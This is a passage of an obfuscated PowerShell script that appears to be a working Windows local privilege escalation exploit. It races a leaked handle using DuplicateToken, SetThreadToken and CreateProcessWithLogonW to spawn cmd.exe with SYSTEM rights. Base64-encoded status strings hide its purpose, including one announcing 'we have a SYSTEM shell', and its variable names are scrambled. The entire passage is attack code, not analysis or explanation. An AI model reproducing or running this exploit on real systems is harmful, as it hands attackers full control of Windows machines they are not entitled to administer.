	echo $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('CgBbAD4AXQAgAEQAdQBwAGwAaQBjAGEAdABpAG4AZwAgAFMAWQBTAFQARQBNACAAdABvAGsAZQBuAA==')))
	${_/\/===\_/\__/\__} = [IntPtr]::Zero
	${___/======\/\/\__} = [Advapi32]::DuplicateToken(${/==\_/\/==\__/\/\}, 2, [ref]${_/\/===\_/\__/\__})
	echo $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('WwA+AF0AIABTAHQAYQByAHQAaQBuAGcAIAB0AG8AawBlAG4AIAByAGEAYwBlAA==')))
	${_/\/==\/\__/\/\/\} = [runspacefactory]::CreateRunspace()
	${_/==\____/\/\_/==} = [powershell]::Create()
	${_/==\____/\/\_/==}.runspace = ${_/\/==\/\__/\/\/\}
	${_/\/==\/\__/\/\/\}.Open()
	[void]${_/==\____/\/\_/==}.AddScript({
		Param (${/=\/==\/=\/==\/\_}, ${_/\/===\_/\__/\__})
		while ($true) {
			${___/======\/\/\__} = [Advapi32]::SetThreadToken([ref]${/=\/==\/=\/==\/\_}, ${_/\/===\_/\__/\__})
		}
	}).AddArgument(${/=\/==\/=\/==\/\_}).AddArgument(${_/\/===\_/\__/\__})
	${_/=======\/\_/\/=} = ${_/==\____/\/\_/==}.BeginInvoke()
	echo $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('WwA+AF0AIABTAHQAYQByAHQAaQBuAGcAIABwAHIAbwBjAGUAcwBzACAAcgBhAGMAZQA=')))
	${__/\_/\_/==\/=\_/} = [diagnostics.stopwatch]::StartNew()
	while (${__/\_/\_/==\/=\_/}.ElapsedMilliseconds -lt 10000) {
		${_____/=\_/\/=\_/=} = New-Object STARTUPINFO
		${_____/=\_/\/=\_/=}.cb = [System.Runtime.InteropServices.Marshal]::SizeOf(${_____/=\_/\/=\_/=}) 
		${_/=\_/\_/\__/====} = New-Object PROCESS_INFORMATION
		${____/===\_/====\_} = (gi -Path ".\" -Verbose).FullName
		${___/======\/\/\__} = [Advapi32]::CreateProcessWithLogonW(
			$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('dQBzAGUAcgA='))), $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('ZABvAG0AYQBpAG4A'))), $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('cABhAHMAcwA='))),
			0x00000002, $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QwA6AFwAVwBpAG4AZABvAHcAcwBcAFMAeQBzAHQAZQBtADMAMgBcAGMAbQBkAC4AZQB4AGUA'))), "",
			0x00000004, $null, ${____/===\_/====\_},
			[ref]${_____/=\_/\/=\_/=}, [ref]${_/=\_/\_/\__/====})
		if (!${___/======\/\/\__}) {
			continue
		}
		${_/\/=\__/\/\/\___} = [IntPtr]::Zero
		${___/======\/\/\__} = [Advapi32]::OpenProcessToken(${_/=\_/\_/\__/====}.hProcess, 0x28, [ref]${_/\/=\__/\/\/\___})
		if (!${___/======\/\/\__}) {
			echo $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('WwAhAF0AIABIAG8AbAB5ACAAaABhAG4AZABsAGUAIABsAGUAYQBrACAAQgBhAHQAbQBhAG4ALAAgAHcAZQAgAGgAYQB2AGUAIABhACAAUwBZAFMAVABFAE0AIABzAGgAZQBsAGwAIQAhAAoA')))
			${___/======\/\/\__} = [Kernel32]::ResumeThread(${_/=\_/\_/\__/====}.hThread)
			${_/==\____/\/\_/==}.Stop()
			${__/\_/\_/==\/=\_/}.Stop()
			Return
		}
		${___/======\/\/\__} = [Kernel32]::TerminateProcess(${_/=\_/\_/\__/====}.hProcess, 1)
		${___/======\/\/\__} = [Kernel32]::CloseHandle(${_/=\_/\_/\__/====}.hProcess)
		${___/======\/\/\__} = [Kernel32]::CloseHandle(${_/=\_/\_/\__/====}.hThread)
	}
	${_/==\____/\/\_/==}.Stop()
	${__/\_/\_/==\/=\_/}.Stop()
}